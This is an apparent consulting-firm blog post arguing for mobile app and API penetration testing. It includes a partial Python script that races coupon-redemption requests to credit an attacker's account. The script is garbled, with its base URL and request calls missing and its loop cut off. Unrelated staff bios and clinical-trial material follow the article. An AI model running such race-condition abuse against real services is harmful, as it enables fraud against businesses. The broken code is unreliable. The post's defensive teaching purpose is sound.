Skip links

Mobile App Security: The Imperative for Mobile Penetration Testing

Jump To Section

Mobile apps have become an integral part of our daily lives. From ordering food to booking a ride, there is an app for almost everything.
Mobile APP Penetration Testing

Mobile apps have become an integral part of our daily lives. From ordering food to booking a ride, there is an app for almost everything. However, as the usage of mobile apps has grown, so has the concern around mobile app security.

The mobile app security landscape has become more complex due to the diverse range of devices, mobile operating systems, and applications. In today’s technology landscape, where mobile apps are widely used, the importance of mobile app security cannot be overstated.

One way to ensure mobile app security is to conduct mobile penetration testing. Penetration testing is a process of evaluating the security of a system or application by simulating an attack from a malicious actor. This activity helps identify vulnerabilities in an application that could be exploited by attackers. Using dynamic analysis, an attacker can monitor API requests in the mobile application communicating to different micro services. This feature expands a company’s attack surface as this can be easily overlooked.

API Security: Protecting Against Mobile App Vulnerabilities

APIs, or Application Programming Interfaces, allow different applications to communicate with each other. Mobile APIs introduce an additional threat vector that requires its own vulnerability checklist, as outlined in the OWASP API Top 10. This, combined with the OWASP Mobile Top 10, provides attackers with a multitude of options to exploit vulnerabilities.

With APIs, attackers can employ tactics like those used in web application attacks, such as broken function level authorization, looking for IDORs (Insecure Direct Object Reference) or utilizing techniques like race conditions to exploit flaws such as lack of rate limiting. The convergence of these two attack methods increases the attacker’s arsenal and emphasizes the importance of securing mobile APIs.

Below is an example of Python code to exploit a race condition to redeem a coupon more than once in quick succession and adding credit to an attacker’s account by abusing a flaw in an applications business logic:


import json

import requests

import grequests

from time import sleep

# Define the base URL and headers for the requests


headers = {“Content-Type”: “application/json”}

# Define functions for making requests

def redeemAsync(email, token, code, nTimes):

data = {“email”: email, “token”: token, “code”: code}

rs = ( + “/redeem”, data=json.dumps(data), headers=headers) for i in range(nTimes))


def redeem(email, token, code):

data = {“email”: email, “token”: token, “code”: code}

resp = + “/redeem”, data=json.dumps(data), headers=headers)

return resp.json()

def makeRequest(email, token, endpoint):

resp = requests.get(BASE_URL + endpoint, params={“email”: email, “token”: token})

return resp.json()

def getBalance(email, token):

return makeRequest(email=email, token=token, endpoint=”/balance”)

def redeemTicket(email, token):

return makeRequest(email=email, token=token, endpoint=”/redeemticket”)

if __name__ == “__main__”:

email = “”

token = “JWT TOKEN HERE”

code = “ALTIMETRIK1337”

reqAsync = True

nTimes = 2

while True:

balanceResp = getBalance(email, token)

if “balance” in balanceResp:

balance = float(balanceResp[“balance”])

print(“Current Balance:”, balance)

if balance > 5000:

redeemTicketResp = redeemTicket(email, token)


By leveraging application data, attackers can breach cloud infrastructure and gain access to internal networks if their environment uses a hybrid solution such as Azure Active Directory. For instance, attackers can comb through the source code of a mobile app to uncover weak passwords or other vulnerabilities in the cloud infrastructure.

They can also scour through public repositories that contain old, forgotten and still valid secret keys or tokens to access cloud assets or API endpoints that are referenced in the mobile application.

Attackers can use the mobile application server as a foothold for lateral movement into the cloud network and eventually find a machine that is connected to the on-prem Active Directory and eventually gain access to the Domain Controller and compromise the internal network.

Below is an attack chain that illustrates this:

In many cases, the application may reveal information about storage locations, such as an insecure S3 bucket, which can be accessed with weak authorization mechanisms or no authorization mechanism at all. In some instances, the S3 bucket may store PCI information from customers.

This underscores the importance of securing mobile apps and their corresponding APIs to prevent attackers from exploiting vulnerabilities and gaining unauthorized access to sensitive information.

Designing Secure APIs and Comprehensive Mobile App Testing

It is important to ensure that APIs are designed with security in mind from the outset. This includes implementing authentication and authorization controls to ensure that only authorized users can access the API, as well as implementing encryption to protect sensitive data in transit. It is also important to validate input data to prevent attacks such as SQL injection and cross-site scripting.

Regular security testing and vulnerability assessments can also help identify and remediate API vulnerabilities.

To enhance the security of your mobile applications, we highly recommend conducting both static and dynamic analysis. By employing static analysis, expert security engineers can meticulously scan your application’s code to identify any potential business logic flaws, insecure permissions, and sensitive information disclosure before the application goes live.

Moreover, dynamic analysis is equally critical in detecting issues that might go unnoticed during static analysis. Security teams can monitor web traffic in real-time, examine the application from a user’s perspective, and identify any potential routes for attackers to exploit or escalate their privileges.

This thorough approach security teams to deliver an all-inclusive testing project that ensures the completeness and consistency of your mobile application. With this comprehensive testing approach, you can have confidence that your mobile application is secure, reliable, and fully optimized for seamless performance.


In conclusion, conducting mobile API testing is a crucial step to guarantee the security not only of mobile applications, but also of any other assets or infrastructure that might be linked to them. By thoroughly testing the APIs, potential vulnerabilities can be identified and addressed before they can be exploited by malicious actors, safeguarding your organization’s sensitive data and reputation.

Picture of Matthew Manalac

Matthew Manalac

Latest Reads


Suggested Reading

Ready to Unlock Your Enterprise's Full Potential?

Vikas Krishan

Chief Digital Business Officer and Head of the EMEA region

Vikas (Vik) Krishan serves as the Chief Digital Business Officer and Head of the EMEA region for Altimetrik. He is responsible for leading and growing the company’s presence across new and existing client relationships within the region.

Vik is a seasoned executive and brings over 25 years of global experience in Financial Services, Digital, Management Consulting, Pre- and Post-deal services and large/ strategic transformational programmes, gained in a variety of senior global leadership roles at firms such as Globant, HCL, Wipro, Logica and EDS and started his career within Investment Banking. He has developed significant cross industry experience across a wide variety of verticals, with a particular focus on working with and advising the C-Suite of Financial Institutions, Private Equity firms and FinTech’s on strategy and growth, operational excellence, performance improvement and digital adoption.

He has served as the engagement lead on multiple global transactions to enable the orchestration of business, technology, and operational change to drive growth and client retention.

Vik, who is based in London, serves as a trustee for the Burma Star Memorial Fund, is a keen photographer and an avid sportsman.

Megan Farrell Herrmanns

Chief Digital Officer, US Central

Megan is a senior business executive with a passion for empowering customers to reach their highest potential. She has depth and breadth of experience working across large enterprise and commercial customers, and across technical and industry domains. With a track record of driving measurable results, she develops trusted relationships with client executives to drive organizational growth, unlock business value, and internalize the use of digital business as a differentiator.

At Altimetrik, Megan is responsible for expanding client relationships and developing new business opportunities in the US Central region. Her focus is on digital business and utilizing her experience to create high growth opportunities for clients. Moreover, she leads the company’s efforts in cultivating and enhancing our partnership with Salesforce, strategically positioning our business to capitalize on new business opportunities.

Prior to Altimetrik, Megan spent 10 years leading Customer Success at Salesforce, helping customers maximize the value of their investments across their technology stack. Prior to Salesforce, Megan spent over 15 years with Accenture, leading large transformational projects for enterprise customers.

Megan earned a Bachelor of Science in Mechanical Engineering from Marquette University. Beyond work, Megan enjoys playing sand volleyball, traveling, watching her kids soccer games, and is actively involved in a philanthropy (Advisory Council for Cradles to Crayons).

Adaptive Clinical Trial Designs: Modify trials based on interim results for faster identification of effective drugs.Identify effective drugs faster with data analytics and machine learning algorithms to analyze interim trial results and modify.
Real-World Evidence (RWE) Integration: Supplement trial data with real-world insights for drug effectiveness and safety.Supplement trial data with real-world insights for drug effectiveness and safety.
Biomarker Identification and Validation: Validate biomarkers predicting treatment response for targeted therapies.Utilize bioinformatics and computational biology to validate biomarkers predicting treatment response for targeted therapies.
Collaborative Clinical Research Networks: Establish networks for better patient recruitment and data sharing.Leverage cloud-based platforms and collaborative software to establish networks for better patient recruitment and data sharing.
Master Protocols and Basket Trials: Evaluate multiple drugs in one trial for efficient drug development.Implement electronic data capture systems and digital platforms to efficiently manage and evaluate multiple drugs or drug combinations within a single trial, enabling more streamlined drug development
Remote and Decentralized Trials: Embrace virtual trials for broader patient participation.Embrace telemedicine, virtual monitoring, and digital health tools to conduct remote and decentralized trials, allowing patients to participate from home and reducing the need for frequent in-person visits
Patient-Centric Trials: Design trials with patient needs in mind for better recruitment and retention.Develop patient-centric mobile apps and web portals that provide trial information, virtual support groups, and patient-reported outcome tracking to enhance patient engagement, recruitment, and retention
Regulatory Engagement and Expedited Review Pathways: Engage regulators early for faster approvals.Utilize digital communication tools to engage regulatory agencies early in the drug development process, enabling faster feedback and exploration of expedited review pathways for accelerated approvals
Companion Diagnostics Development: Develop diagnostics for targeted recruitment and personalized treatment.Implement bioinformatics and genomics technologies to develop companion diagnostics that can identify patient subpopulations likely to benefit from the drug, aiding in targeted recruitment and personalized treatment
Data Standardization and Interoperability: Ensure seamless data exchange among research sites.Utilize interoperable electronic health record systems and health data standards to ensure seamless data exchange among different research sites, promoting efficient data aggregation and analysis
Use of AI and Predictive Analytics: Apply AI for drug candidate identification and data analysis.Leverage AI algorithms and predictive analytics to analyze large datasets, identify potential drug candidates, optimize trial designs, and predict treatment outcomes, accelerating the drug development process
R&D Investments: Improve the drug or expand indicationsUtilize computational modelling and simulation techniques to accelerate drug discovery and optimize drug development processes